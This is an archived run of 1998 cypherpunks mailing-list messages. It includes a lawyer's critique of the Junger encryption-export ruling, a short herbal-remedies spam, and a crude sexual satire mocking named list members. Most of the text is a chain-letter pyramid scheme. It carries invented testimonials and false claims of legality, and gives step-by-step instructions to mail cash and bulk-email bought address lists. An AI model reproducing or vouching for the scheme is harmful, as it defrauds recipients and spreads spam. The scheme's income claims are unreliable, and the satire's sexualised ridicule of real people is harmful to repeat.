security because the INTELSAT 708 satellite was uniquely keyed.

[End fax]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cindy Cohn <Cindy@mcglashan.com>
Date: Tue, 14 Jul 1998 18:07:21 -0700 (PDT)
To: bernstein-announce@toad.com
Subject: No Subject
Message-ID: <199807150056.RAA09720@gw.quake.net>
MIME-Version: 1.0
Content-Type: text/plain


Hi all,

I've now had a chance to review the decision in the Junger case.  I think it
contains many flaws, but will just highlight a few here.  

The most striking thing about the opinion is how much the judge's willfully
ignored the undisputed factual record.   Plaintiffs submitted voluminous
declarations from programmers, computer science professors and others
confirming that they often communicate using source code.  The Declarants
included Professor Abelson of MIT, author of the key introductory textbook
of computer science, as well as Professor Appel from Princeton and several
prominent cryptographers and general computer scientists.  All of them
confirmed the need to read, write and share source code as part of their
work, and as part of the development of science.  They also testified to the
fact that many, many other people communicate using source code, and that
higher level languages are developed to allow humans to write, read and
develop each others ideas.  

The Judge does quote the Supreme Court ruling that speech must be protected
by the First Amendment unless it is  "so far removed from any exposition of
ideas, and from truth,  *science,* morality, and arts in general . . . "
 
Yet despite these clear facts and despite the Supreme Court's clear
inclusion of scientific speech as protected expression,  Judge Gwin states:  

 1.  "encryption source code may *occasionally* be expressive (p.12)
2.   that in the "overwhelming majority of circumstances" encryption source
code is exported to transfer functions, not to communicate ideas."  (p.13)
 3.  "For the broad majority of persons receipting such source code, the
value comes from the function" (p.13-14).
4.   "encryption source code is rarely expressive"  (p. 15).
5.  "source code is conduct that can occasionally have communicative
elements."  (p.16)
6.  "Source code is a set of instructions to a computer that is *commonly*
distributed for the wholly non-expressive purpose of controlling a
computer's operation."  (page 17)
7.   "encryption software is not typically expression"  (page 18)

There are similar statements of fact throughout the decision, none of which
contain citations to anything in the record to support them.  

So where is the evidence to support his conclusions?  The government
submitted no empirical studies of source code "exports"  from which one
could conclude how often source code is "expressive."  Certainly this is not
the kind of thing which can be judicially noticed.  At a minimum, the
declarations create a triable issue of material fact as to how often source
code is used to communicate ideas.  This alone should preclude summary
judgment.  

Also, I know of know authority which holds that the number of people who
communicate in a given language is the basis on which we decide whether that
communication is speech.  Judge Gwin certainly cited none, but his opinion
assumes that this is relevant.  

He also says that "certain software is inherently expressive" (page 13)
without stating what he thinks that kind of software is and how it differs
from encryption software.  The Junger team argued that the "functionality"
of encryption software, allowing privacy of speech, makes the software
subject to the First Amendment on its own, just as the regulations of
printing presses and newspaper racks violate the First Amendment even though
the item itself may not be speech.  The Judge ignored this argument
entirely.      

Once the judge has decided that source code is not *sufficiently*
expressive, he ignores the settled analysis for prior restraints in order to
avoid applying the tests.  The easiest mistake to see is his reliance on the
9th Circuit Roulette decision for his holding that prior restraint review
shouldn't apply.  Roulette was *not* a prior restraint case.  It considered
an ordinance which allowed the police to arrest citizens for sitting on the
sidewalks.  In Roulette, a person didn't have to apply for a license to sit
on the sidewalks, he or she simply did it.  The question of whether the act
was expressive or not would always be reviewed by a Judge, as part of the
criminal process.  In the case of cryptography,in contrast,  one of the key
issues has been the fact that the cryptography regulations do not allow for
a judge to review agency decisions denying or requiring a license.  Thus,
applying Roulette as the standard to judge whether prior restraint analysis
applies is just plain wrong.  

Having dispensed with prior restraint by relying on a non-prior restraint
case, the Court then considers overbreadth.   Again, he ignores the record
entirely.  He claims, again without any citation to the record,  that Junger
has failed to show that "the resulting injury to other academics is the very
same injury that Junger allegedly suffered."  

But Junger included Declarations from people who were *not* academics who
have been injured by the export restrictions.  He included declarations from
Mr. Liebman (concerning some O'Reilly software) and Mr. Behlendorf
(concerning the Apache server) demonstrating that even those whose software
contains no encryption capability whatsoever have been injured by the
encryption regulations.  The record contains plenty of evidence that people
other than Junger, attempting to do different kinds of things than he does,
have suffered different kinds of injury due to the regulations.   Similarly,
Judge Gwin states that the regulations are not vague, ignoring the record
evidence that many, many people do not understand them and have been chilled
as a result.  

Next, Judge Gwin finds content neutrality based upon the argument that
government is controlling the "functionality" of the software rather than
its content.  Acceptance of this phony distinction requires that a person
have no understanding of computer programming.  The content and the
functionality of a computer program are synonymous.  They have to be.  There
is no way to change or limit the functionality without also changing the
content of the source code.  To mandate key recovery is to mandate that
computer programs have different content than they would otherwise; its'
like saying that the government wants to control the "taste" of chocolate
cake rather than the recipe.  Change one, you must change the other.  

Judge Gwin also relies on the fact that the Government allows "export" of
software on paper, thus defining "functionality" as based upon the fact that
source code can be converted into object code which can be run.   But this
analysis also ignores the existence of scanners and typists.  Software on
paper isn't any less "functional" than software in electronic form.   It
simply requires one more, simple, step to make it functional.  In the case
of the single page of source code which is Snuffle, in the Bernstein case,
the difference cannot be more than ten minutes worth of typing or a few
minutes to scan and correct errors prior to compiling.  *This* is the
difference our national security rests upon?

Judge Gwin then applies intermediate scrutiny, quickly finding that the test
is met.  

In the end, Judge Gwin decided, despite the evidence, that source code isn't
often read by anyone and so shouldn't really deserve First Amendment
protection.  The rest of the analysis flows from there, with no regard for
the actual facts in the record.  The result is that we have a new category
of lesser protected expression, speech which is also "functional," without
any clear or understandable definition of the term "functional."  And all
those computer scientists and their settled methods of communicating with
each other apparently don't count when it comes to the First Amendment.

The larger ramifications of this holding, if it becomes law for the rest of
us, are frightening.  Taken to its extreme, this holding could be the
exception that swallows the rule of Reno v. ACLU.  If the fact that
something can "function" means it is not speech, every web page written in
HTML could be held not protected, since at some level each page is a
"functioning" computer program.  Certainly any web page or other electronic
publication which contains a Java applet is a "functioning" program. 

As I noted above, there are other criticisms which can be leveled as well.
These are simply a few that I've found so far.   

Cindy 
 






******************************
Cindy A. Cohn, Cindy@McGlashan.com
McGlashan & Sarrail, P.C.
177 Bovet Road, 6th Floor
San Mateo, CA 94402
(650) 341-2585 (tel)
(650) 341-1395 (fax)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: webmaster@mountainkeep.com
Date: Tue, 14 Jul 1998 20:11:01 -0700 (PDT)
To: Friend
Subject: Herbal Remedies
Message-ID: <199807150310.UAA27242@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Dear Internet Friends,

If you want to learn about how to provide your family with herbal remedies from the garden to the medicine 
cabinet, please visit our website at www.mountainkeep.com   Thank you.

This message complies with the proposed United States Federal requirements for commercial email bill, 
Section 301.  
For additional info see:
http://www.senate.gov/~murkowski/commercialemail/EMailAmendText.html

Mountainkeep Publishing
2510 N. 47th St. #204
Boulder, CO 80301
(303)545-5452

Per Section 301, Paragraph (a)(2)(C) of S. 1618,
further transmissions to you by the sender of this
email may be stopped at no cost to you by
sending a reply to this email address with theword "remove" in the subject line.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: remove5050@usa.net
Date: Tue, 14 Jul 1998 20:19:35 -0700 (PDT)
To: remove5050@usa.net
Subject: Status
Message-ID: <265046_24589591>
MIME-Version: 1.0
Content-Type: text/plain



reply to
remove5050@usa.net


Please excuse this intrusion.

Your Name Has ALREADY BEEN DELETED from our database.

I would like to let you in on a good idea...

I NEVER THOUGHT I'D BE THE ONE TELLING YOU THIS....

I ACTUALLY READ & ACTED ON THIS PIECE OF E-MAIL,
AND THEN WENT TO EUROPE FOR THE HOLIDAYS, PAYING
FOR IT IN CASH!

My name is Matthew Forti ; I'm a 42-year-old father, husband, and
full time scientist.  As a rule, I delete all unsolicited "junk"
e-mail and use my account primarily for business.  I received what
I assumed was this same e-mail countless times and deleted it each time.


About two months ago I received it again and, because of the catchy
subject line, I finally read it. Afterwards, I thought, "OK, I give
in, I'm going to try this. I can certainly afford to invest $20 and,
on the other hand, there is nothing wrong with creating a little
excess cash." I promptly mailed four $5 bills and, after receiving the
reports paid a friend of mine a small fee to send out some e-mail
advertisements for me. After reading the reports, I also learned how
easy it is to bulk e-mail for free!

I was not prepared for the results.  Everyday for the last six weeks,
my P.O. box has been overflowing with $5 bills; many days the excess
fills up an extra mail bin and I've had to upgrade to the corporate-size

box!  I am stunned by all the cash that keeps rolling in!

I promise you, if you follow the directions in this e-mail and be
prepared to eventually set aside about an hour each day to follow
up (and count your money!), you will make at least as much money
as we did.  You don't need to be a whiz at the computer, but I'll
bet you already are. If you can open an envelope, remove the money,
and send an e-mail message, then you're on your way to the bank.
Take the time to read this so you'll understand how easy it is.
Believe me, it works!

GO FOR IT NOW!

Sincerely,

Matthew Forti
*       *       *       *       *       *       *       *       *
*       *       *

**************************************************
You are about to make up to $50,000 - In less than 90 days
Read the enclosed program...THEN READ IT AGAIN!
**************************************************

This is the letter that got my attention.  Read on and I'm sure
you will agree that this is a great plan!


Dear Friend,

The enclosed information is something I almost let slip through
my Fingers. Fortunately, sometime later I re-read everything and
gave some thought and study to it. Please do the same.  It's so
simple to do.

And you won't be left out in the cold to figure it all out yourself.
Look further down in this letter for the information you will
receive from JNC Marketing.  They give you the locations of the best
software
(FREE SOFTWARE) to send out large quantities of email.
(normally this kind of software is several hundred dollars)
They even give you easy to understand, proven, step by step
instructions for success with this program.  In fact, they helped
me get started and I'm so thankful.  It's hard to believe that this
is as simple as it is, but it really is SIMPLE.  You will even get
support from them to send out a mailing (if you need it).  You won't
get this kind of help from other programs of this nature.  It
makes all the difference in the world.
_____________________________________________________________

My name is Anne Bowman. I am 31-year-old graduate student
desperately trying to finish my degree and begin working in
my chosen field--that is, if I am lucky enough to find a job in
the crowded market.  Like most people in this day and age, it
is hard to make ends meet, and being a student does not help
the situation at all ( If I ever have to buy one more box of
macaroni and cheese I think I would have to scream).  I
returned to school after having worked for several years
with little potential for achieving what I had expected
out of life.  I figured if I returned to school and received my
Ph.D. there would be several opportunities for me out there
to achieve my goals.  After seeing my fellow graduate students
receive their degrees and, depressingly, not find respectable
positions in their chosen field I began to think, "Oh no not
again!"  Four extra years in school and an extra $20,000 in
student loans on top of the first $18,000, what will I do if the
same happens to me?"  I began to doubt my patience for the
long term investment in schooling, and decided enough was
enough, "Why can't I make real money now instead of waiting
to graduate with no guarantee of a lucrative return for all of my
efforts!"  I am writing to share my experience with other hopeful
students out there, as well as ANYONE looking for an opportunity
to take their financial situation into their own hands.  I hope you
will consider this opportunity seriously and that this will change
your life FOREVER!.., FINANCIALLY!!!  And once you get
started it takes so little of your time.


In mid October '97, I received this program. I didn't send for
it, or ask for it, they just got my name off a mailing list. I TOOK
THIS AS A SIGN!!!  After reading it several times, to make
sure I was reading it correctly, it made perfect sense.  Here was
a MONEY-MAKING PHENOMENON. I could invest as much
as I wanted to start (about as much as it costs for a pizza!),
without putting me further in debt. After I got a pencil and paper
and figured it out, I would at least get my money back. After
determining that the program is LEGAL and NOT A CHAIN
LETTER, I decided "I HAVE NOTHING TO LOSE".

Initially I sent 15,000 emails, (without any costs to me) only a
couple of hours of my time on-line. The great thing about email
is that I didn't need any money for printing to send out the
program, only the time to fulfill my orders.  There is a vast
on-line market available to everyone who owns a computer.
Following the advice of the person from whom I received this
letter, I am telling you like it is, and I hope it doesn't turn you
off, but I promised myself I would not "rip-off" anyone, no
matter how much money it cost me!  After you receive the
reports they explain everything to you.

In one week, I was starting to receive orders for REPORT #1.
By mid November, I had received 40 orders for REPORT #1.
When you read the GUARANTEE in the program you will
see that "YOU MUST RECEIVE 15 TO 20 ORDERS FOR
REPORT #1 WITHIN 2 WEEKS IF YOU DON'T SEND
OUT MORE PROGRAMS UNTIL YOU DO!" My first step
In making $50,000 in 20 to 90 days was done. By the beginning
of December, I had received 174 orders for REPORT #2. If you
go back to the GUARANTEE.  "YOU MUST RECEIVE 100 OR
MORE ORDERS FOR REPORT #2 WITHIN TWO WEEKS.
IF NOT SEND OUT MORE PROGRAMS UNTIL YOU DO.
ONCE YOU HAVE 100 ORDERS, THE REST IS EASY, RELAX,
YOU WILL MAKE YOUR $50,000 GOAL". Well, I had 174 orders
for REPORT #2, 74 more than I needed. So I sat back and relaxed.
By January 20th, of my emailing of 15,000, I received $54,000 with
more coming in ever day.  The great thing about this program
is you can begin the process over and over again without any limit
on potential income!

I paid off ALL my student loans, and together with everything
I have learned in school, I am now saving in order to open up my
own business related to my field as soon as I graduate. Please take
time to read the attached program. IT WILL CHANGE YOUR LIFE
FOREVER! Remember, it won't work if you don't try it.  This program
does work, but you must follow it EXACTLY!  Especially the rules
of not trying to place your name in a different place on the list. It
doesn't work, you'll lose out on a lot of money! REPORT #2 explains
this.  ALWAYS follow the guarantee, 15 to 20 orders of REPORT #1
and 100 or more orders for REPORT #2 and you will make $50,000
or more in 20 to 90 days. I AM LIVING PROOF THAT IT WORKS!!

If you choose not to participate in this program, I'm sorry, It really
is
a great opportunity with little cost or risk to you. If you choose to
participate, follow the program and you will be on your way to financial

security.

To my fellow graduate students out there, good luck to you and I
sympathize.  And to all other persons in financial trouble consider this

letter a sign and please take advantage of this opportunity.  YOU WON'T
BE DISAPPOINTED!

                                                            Sincerely,
                                                            Anne Bowman

The following testimonial was at the bottom of this letter but it was
too good to leave down there so I moved it up here.  It is exactly how
I felt at first and feel now.

"The first week after I started this program was torture.  I couldn't
wait to see if it was really going to work after I mailed out my first
batch of letters.  I chuckle every day now when I walk out of the
post office with my envelopes.  This is so easy, I still can't believe
it's happening!"
Don Masterson, Troy, NY


$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

>From here down is the instruction portion of this letter...


This is a LEGAL, LOW-COST, MONEYMAKING PHENOMENON.

PRINT this letter, read the directions, THEN GET STARTED TODAY!

You are about to embark on the most profitable and unique program
you may ever see.  Many times over, it has demonstrated and proven
its ability to generate large amounts of cash.  This program is showing
fantastic appeal with a huge and ever-growing on-line population
desirous of additional  income.

This is a legitimate, LEGAL, moneymaking opportunity.  It does not
require you to come in contact with people, do any hard work, and
best of all, you never have to leave the house, except to get the mail
and go to the bank!

This truly is that lucky break you've been waiting for!  Simply follow
the easy instructions in this letter, and your financial dreams will
come true! When followed correctly, this electronic, multi-level
marketing program works perfectly... 100% OF THE TIME!

Thousands of people have used this program to:
-  Raise capital to start their own business
-  Pay off debts
-  Buy homes, cars, etc.,
-  Even retire!

This is your chance, so read on and get started today!
----------------------------------------------------------------------------------

OVERVIEW OF THIS EXTRAORDINARY ELECTRONIC
MULTI-LEVEL MARKETING PROGRAM
----------------------------------------------------------------------------------

Basically, this is what we do:

We send thousands of people a product for $5.00 that costs next to
nothing to produce and e-mail. As with all multi-level businesses, we
build our business by recruiting new partners and selling our products.
Every state in the U.S. allows you to recruit new multi-level business
online (via your computer).

The products in this program are a series of four business and financial

reports costing $5.00 each.  Each order you receive via "snail mail"
will
include:

  * $5.00 cash
  * The name and number of the report they are ordering
  * The e-mail address where you will e-mail them the report they
ordered.

To fill each order, you simply e-mail the product to the buyer. The
$5.00 is yours!
This is the EASIEST electronic multi-level marketing business anywhere!

FOLLOW THE INSTRUCTIONS TO THE LETTER AND
BE PREPARED TO REAP THE STAGGERING BENEFITS!

******* I N S T R U C T I O N S *******

This is what you MUST do:

1.  Order all 4 reports shown on the list below (you can't sell them if
you
don't order them).

     *  For each report, send $5.00 CASH, the NAME & NUMBER OF THE
        REPORT YOU ARE ORDERING, YOUR E-MAIL ADDRESS, and YOUR
        RETURN POSTAL ADDRESS (in case of a problem) to the person whose

        name appears on the list next to the report.

     *  When you place your order, make sure you order each of the four
        reports.  You will need all four reports so that you can save
them
        on your computer and resell them.

     *  Within a few days you will receive, via e-mail, each of the four

         reports.  Save them on your computer so they will be accessible

         for you to send to the 1,000's of people who will order them
from you.

2.  IMPORTANT-- DO NOT alter the names of the people who are listed
     next  to each report, or their sequence on the list, in any way
other
     than is instructed below in steps "a" through "d" or you will lose
out
     on the majority of your profits.  ONCE YOU UNDERSTAND THE WAY THIS
     WORKS, YOU WILL UNDERSTAND WHY IT DOESN'T WORK IF YOU CHANGE IT.
Remember,
     this method has been tested, and if you alter it, it will not work.

    a.  Look below for the listing of available reports.

    b.  After you've ordered the four reports, replace the name and
address
         under REPORT #1 with your name and address, moving the one that

         was there down to REPORT #2.

    c.  Move the name and address that was under REPORT #2 down to
         REPORT #3.

    d.  Move the name and address that was under REPORT #3 down to
         REPORT #4.

    e.  The name and address that was under REPORT #4 is removed from
         the list and has NO DOUBT collected their 50 grand.

Please make sure you copy everyone's name and address ACCURATELY!!!

3.  Take this entire letter, including the modified list of names, and
save
     it to your computer.  Make NO changes to the INSTRUCTION portion of

     this letter.

4.  Now you're ready to start an advertising campaign on the
     Internet!  Advertising on the Internet is very, very
     inexpensive, and there are HUNDREDS of FREE places to
     advertise, but email has, by far, proven itself to be the best
medium for
     this program.  And the emailers best friend is e-mail lists.
     You can buy these lists for under $20/20,000 addresses or you can
pay
     someone a minimal charge to take care of the mailing for you.  BE
SURE TO START
     YOUR AD CAMPAIGN IMMEDIATELY!  Each day that passes while you think
about
     it is a day without profit.

5.  For every $5.00 you receive, all you must do is e-mail them the
report
     they ordered.  THAT'S IT!  ALWAYS PROVIDE SAME-DAY SERVICE
     ON ALL ORDERS!  This will guarantee that the e-mail THEY send out,
     with YOUR name and address on it, will be prompt because they can't

     advertise until they receive the report!

------------------------------------------
AVAILABLE REPORTS
------------------------------------------
***Order Each REPORT by NUMBER and NAME***

Notes:
-  ALWAYS SEND $5 CASH FOR EACH REPORT
-  ALWAYS SEND YOUR ORDER VIA FIRST CLASS MAIL
-  Make sure the cash is concealed by wrapping it in at least two sheets
of
paper
-  On one of those sheets of paper, include: (a) the number & name of
the
report you are ordering, (b) your e-mail address, and (c) your postal
address.  (using your printer is the best way to do this)
_________________________________________________________________
REPORT #1 "HOW TO MAKE $250,000 THROUGH MULTI-LEVEL SALES"

ORDER REPORT #1 FROM:

Stat Services, Inc.
PO Box 72
Long Green, MD 21092-9998
_________________________________________________________________
REPORT #2 "MAJOR CORPORATIONS AND MULTI-LEVEL SALES"

ORDER REPORT #2 FROM:

JNC Marketing of Maryland
P.O. Box 25070
Baltimore, MD 21224-5707

*****IMPORTANT NOTE*****
Our success is due to sending out emails to prospective participants, we
are happy to help you get started by giving you the location of several
free programs that will allow you to send out large quantities of e-mail
easily. Also, we can help you email to huge lists. We will email the
information to you the same day we receive your report request.  Just
jot down "help please" on the report request that you send with your
$5.  You will receive our real email address when we send you this
report and you can contact us for any questions you may have.   (program
participants, you may leave this offer with us as we are moved down the
list.  We will honor it for the duration of the program. Just move it
down, with the name, to the next position when you send out your first
mailings).
_________________________________________________________________
REPORT #3 "SOURCES FOR THE BEST MAILING LISTS"

ORDER REPORT #3 FROM:

Capital H Ventures
P.O. Box 8029
Jacksonville, FL 32239
_________________________________________________________________
REPORT #4 "EVALUATING MULTI-LEVEL SALES PLANS"

ORDER REPORT #4 FROM:

Abot Marketing
PO BOX 2523
Chapel Hill, NC 27515-2523

----------------------------------------------------------------------------

HERE'S HOW THIS AMAZING PLAN WILL MAKE YOU $MONEY$
----------------------------------------------------------------------------

Let's say you decide to start small just to see how well it works.
Assume
your goal is to get 10 people to participate on your first level.
(Placing
a lot of FREE ads on the Internet will EASILY get a larger response.)
Also
assume that everyone else in YOUR ORGANIZATION gets ONLY 10 down line
members. Follow this example to achieve the STAGGERING results below.

1st level--your 10 members with$5...................................$50
2nd level--10 members from those 10 ($5 x 100)..................$500
3rd level--10 members from those 100 ($5 x 1,000)..........$5,000
4th level--10 members from those 1,000 ($5 x 10,000)...$50,000
THIS TOTALS----------->$55,550

Remember friends, this assumes that the people who participate only
recruit 10 people each.  Think for a moment what would happen if they
got 20 people to participate!  Most people get 100's of participants!
THINK ABOUT IT!

Your cost to participate in this is practically nothing (surely you can
afford $20 for a chance to make $ 55,000).  You obviously already have
an Internet connection and e-mail is FREE!!!  REPORT# 3 shows you the
most productive methods for bulk e-mailing and purchasing e-mail lists.
Some list & bulk e-mail vendors even work on trade!

About 50,000 new people get online every month!

*******TIPS FOR SUCCESS*******

*  TREAT THIS AS YOUR BUSINESS!  Be prompt, professional, and follow
     the directions accurately.

*  Send for the four reports IMMEDIATELY so you will have them when
    the orders start coming in because:

    When you receive a $5 order, you MUST send out the requested
    product/report to comply with the U.S.  Postal & Lottery Laws, Title

    18, Sections 1302 and 1341 or Title 18, Section 3005 in the U.S.
Code,
    also Code of Federal Regs. Vol. 16, Sections 255 and 436, which
    state that "a product or service must be exchanged for money
received."

*  ALWAYS PROVIDE SAME-DAY SERVICE ON THE ORDERS YOU RECEIVE.

*  Be patient and persistent with this program.  If you follow the
    instructions exactly, the results WILL undoubtedly be SUCCESSFUL!

*  ABOVE ALL, HAVE FAITH IN YOURSELF AND KNOW YOU WILL SUCCEED!

*******YOUR SUCCESS GUIDELINE*******

Follow these guidelines to guarantee your success:
I CAN'T STRESS ENOUGH HOW IMPORTANT THIS NEXT SECTION IS!!!!

If you don't receive 10 to 20 orders for REPORT #1 within two weeks,
continue advertising until you do.  Then, a couple of weeks later you
should receive at least 100 orders for REPORT #2.  If you don't,
continue
advertising until you do.  Once you have received 100 or more orders
for REPORT #2, YOU CAN RELAX, because the system is already working
for you, and the cash will continue to roll in!

THIS IS IMPORTANT TO REMEMBER:

Every time your name is moved down on the list, you are placed in front
of
a DIFFERENT report.  You can KEEP TRACK of your PROGRESS by watching
which report people are ordering from you.  If you want to generate more
income,
send another batch of e-mails and start the whole process again!  There
is
no limit to the income you will generate from this business!

NOTE:  If you need help with starting a business, registering a business

name, how income tax is handled, etc., contact your local office of the
Small
Business Administration (a Federal agency) for free help and answers to
questions.  Also, the Internal Revenue Service offers free help via
telephone
and free seminars about business taxes.

*******T  E  S  T  I  M  O  N  I  A  L  S*******

The first week after I started this program was torture.  I couldn't
wait
to see if it was really going to work after I mailed out my first batch
of letters.  I chuckle every day now when I walk out of the post office
with my envelopes.  This is so easy, I still can't believe it's
happening!
Don Masterson, Troy, NY


This program does work, but you must follow it EXACTLY!  Especially
the rule of not trying to place your name in a different position, it
won't
work and you'll lose a lot of potential income.  I'm living proof that
it works.
It really is a great opportunity to make relatively easy money, with
little
cost to you.  If you do choose to participate, follow the program
exactly,
and you'll be on your way to financial security.
Sean McLaughlin, Jackson, MS

My name is Frank.  My wife, Doris, and I live in Bel-Air, MD.  I am a
cost accountant with a major U.S. Corporation and I make pretty good
money. When I received the program I grumbled to Doris about receiving
"junk mail." I made fun of the whole thing, spouting my knowledge of the

population and percentages involved.  I "knew" it wouldn't work.  Doris
totally ignored my supposed intelligence and jumped in with both feet.
I made merciless fun of her, and was ready to lay the old "I told you
so"
on her when the thing didn't work...  Well, the laugh was on me!  Within

two weeks she had received over 50 responses.  Within 45 days she had
received over $147,200 in $5 bills!  I was shocked!  I was sure that I
had
it all figured and that it wouldn't work. I AM a believer now.  I have
joined
Doris in her "hobby."   I did have seven more years until retirement,
but I
think of the "rat race" and it's not for me.  We owe it all to MLM.
Frank T., Bel-Air, MD

I just want to pass along my best wishes and encouragement to you.  Any
doubts you have will vanish when your first orders come in.  I even
checked
with the U.S. Post Office to verify that the plan was legal.  It
definitely is!
IT WORKS!!!
Paul Johnson, Raleigh, NC

The main reason for this letter is to convince you that this system is
honest, lawful, extremely profitable, and is a way to get a large amount
of
money in a short time.  I was approached several times before I checked
this out.  I joined just to see what one could expect in return for the
minimal
effort and money required.  To my astonishment, I received $36,470.00 in

the first 14 weeks, with money still coming in.
Sincerely yours, Phillip A. Brown, Esq.

Not being the gambling type, it took me several weeks to make up my
mind to participate in this plan.  But conservative that I am, I decided
that
the initial investment was so little that there was just no way that I
wouldn't
get enough orders to at least get my money back.  Boy, was I surprised
when
I found my medium-size post office box crammed with orders!  For awhile,
it
got so overloaded that I had to start picking up my mail at the window.
I'll
make more money this year than any 10 years of my life before.  The nice
thing
about this deal is that it doesn't matter where in the U.S. the people
live. There
simply isn't a better investment with a faster return.
Mary Rockland, Lansing, MI

I had received this program before.  I deleted it, but later I wondered
if I shouldn't have given it a try.  Of course, I had no idea who to
contact
to get another copy, so I had to wait until I was e-mailed another
program.
11 months passed then it came...I didn't delete this one!...I made more
than
$41,000 on the first try!!
Wilburn, Muncie, IN

This is my third time to participate in this plan.  We have quit our
jobs,
and will soon buy a home on the beach and live off the interest on our
money.  The only way on earth that this plan will work for you is if you
do
it.  For your sake, and for your family's sake don't pass up this golden

opportunity.  Good luck and happy spending!
Charles Fairchild, Spokane, WA

When you have made your money and want to travel, find great cruises,
tours and airline tickets at our favorite on-line travel site at
http://www.NeTrip.com. This program works. IT WILL CHANGE YOUR LIFE FOR
THE BETTER AND GIVE YOU FINANCIAL FREEDOM. It has given our marriage the
freedom to travel the world.
Steve and Eileen, Chicago, IL

ORDER YOUR REPORTS TODAY AND GET
STARTED ON YOUR ROAD TO
FINANCIAL FREEDOM!!!







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Tue, 14 Jul 1998 20:32:47 -0700 (PDT)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <009C92EF.3F4221C0.5@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


~         BUMGIRL          ~
Entertainment for NastyGirls             July 1998 * $7.09
____________________________

Trojan Horse Sucking
Anniversary Issue

BumGirl Interview:
Wham! Bam! Thank ou Ma'am!
T.C. BUTTSLAM
{AKA-T.C. May, FifteenInchNails, Human Gus-Peter Sr., 
     AConsistentNetPersonaToBeNamedLater, CypherPunks
     Philosopher King, The Last True CypherPunk, 
     The Only Real CypherPunk, ad infinitum}

VIAGRA AND SALTPETER
Jim Belushi's Untold Story

Mick 
Jagger
GIVES GREAT LIP!

_____________________________________________________________

			DEAR BUMGIRL

BUMMED BO
  "I was devastated to learn that the June, 1998, issue of
  BumBoy Magazine was nothing more than a fraudulent ruse
  by the Electronic Forgery Foundation.
  "Were the terrible things said about Tim C. May in the
  BumBoy Interview with C-J VAN DAMNNED actually true?"
~Eric Cordial, T.O.T.O.

  {ou will find out in this month's BumGirl Interview,
   as we bend you over and 'give it to you'--straight 
   from the Horse's Ass. - BG}

		     THE BUMGIRL ADVISOR

THE DOORS OF DEPTH PERCEPTION
  "I gagged Linda Lovelace. What do I do with the body?"
~ William GagHer III,
  Dawn Long Juan of the CypherPunks Disturbed Male LISP

  {Wake up! (and smell Jennifer Flowers...) - BG}


			 MOVIES

TERMINATING RESISTOR 3
TR3 completes the Magic Circle of Eunuchs with a bizzare, if
somewhat predictable twist, as ACyborgToBeNamedLater begins
to materialize on the SilverSceenOfVirtualReality in the form
of TheRealGuy...naked, as usual.
It turns out that the Author, sent back in VirtualRealityTime
by John Parker, in order to ensure the safety of Captain John
Parker, thus preserving the course of history taken by the
American Revolution, got drunker than a skunk on cheap Scotch,
and ended up embroiled in the Legendary CypherPunks Moderation 
Revolution/Anti-Censorship CounterRevolution of 1997, instead.
The Author, again predictably, spills Scotch on his Digital
Implant during his journey through time, frying the Radio
Shack circuitry that resulted in HimOrHer being dubbed, "The
Six Million Peso ManOrWoman ($42.00/U.S.)" and becomes a
Taoist AuthorBot working for both the Farces of Light and
the Farces of Darkness, thus saving the movie producers the
expense of paying an extra actor in this low-budget, B-grade
Film BlancNoire.
The movie quickly degenerates into a pornographic monstrosity,
with Sarah Parker, unsure as to who the father of John Parker
actually is, since the little glue-sniffing prick was conceived
during an alcoholic binge, fucks everyone in sight, to make 
sure the little bastard gets conceived. The Author, obsessive-
compulsive tit-man that he is, invariably throws his hands over
her boobs at the slightest sign of danger, claiming, "John's a
growing boy...he needs his milk."
Investigating the Church of the SubGenius, the AuthorBot soon
discovers that the movie is being produced by a group of non-
union UnderGroundReptilianNazis, as a result of overhearing
several of the producer's phone conversations, which they
always end by saying, "Let's do Earth."
The AuthorBot develops an obsession with Little Timmy Mayonnaise
after becoming sexually excited by the Evil Dr. Vulis's ASCII
Art Spams, begins wearing a CoonSkin hat made from the hide of
Medgar Evans and drunkenly mumbling, "Remember Los Alamos...
Chop, Chop!" at every opportunity.
The saving grace of the movie is the soundtrack, courtesy of
Al Fowl And The Snakes, a Tucson ReptilianChickenBot Band
of ill-repute, featuring their Number 1 With a HollowPoint-
TeflonTipped-CopKillerBullet song, "If ou Can't Kill The
Authority Figure ou Love/Hate, Kill The One In our Cross-
Hairs."

BUMGIRL RATING - One Long, Hard Prick Up our Butt

__________________________________________________________

BumGirl Interview: T.C. BUTTSLAM

  A LindaLoveLaceInDepthInterview with one of the original
  Flounders ("I may smell like fish, but don't call me 
  chicken.") of the CypherPunks Disturbed Male LISP, Timothy 
  C. "No! It doesn't stand for 'cocksucker'!" May.
  After checking the Andy WhoreHole Mailing List archives, 
  and finding that it was <tcmay@got.net> who originally 
  posted the concept that, in the future, every CypherPunk 
  would have 15" of fame, BumGirl EditWhores decided to change
  the cover of the July, 1998, edition to feature a picture
  of a variety of current CypherPunks wearing only athletic-
  support cups with long, long, long bar-codes on them. 

  {ANastyBumGirlToBeReamedLater, caught in a cross-fire on
  Mayonnaise Mountain between Timothy C. May, the Philosopher
  Marksman of the CypherPunks Disturbed Male LISP, and LEA's
  who were badly outmanned and outgunned by the Cult Of One
  CypherPunk who owns a variety of weaponry registered in
  the names of a plethora of CypherPunks Consistent Net
  Personas, bent over and stuck her head in the sand, hoping
  that if she took one in the butt, it would be a long, hard
  one, Teflon-tipped, in order to penetrate her new Kevlar
  panties.
  The BumGirl interview took place during lulls in the action,
  when LEA agents carried off their dead and wounded, while
  LittleBigTimmy and Dust'em Hoffman argued over their Pretty
  Lousy Privacy CryptoPhones as to how many dead IRS agents
  it takes to spell, "I *told* you Jim Bell is a CypherPunk!"}


BumGirl: our Tim C. May CypherPunks Consistent Net Persona
has such long and well-documented history of raising hell with
the sides of the Bleeding Edge of InterNet Freedom and Privacy
Technology (TCM) that it is hard to know where to begin.

TCM: Let's talk about the Author, instead.

BumGirl: Shit! Is this interview just another piece of mindless
trash from the Electronic Forgery Foundation?

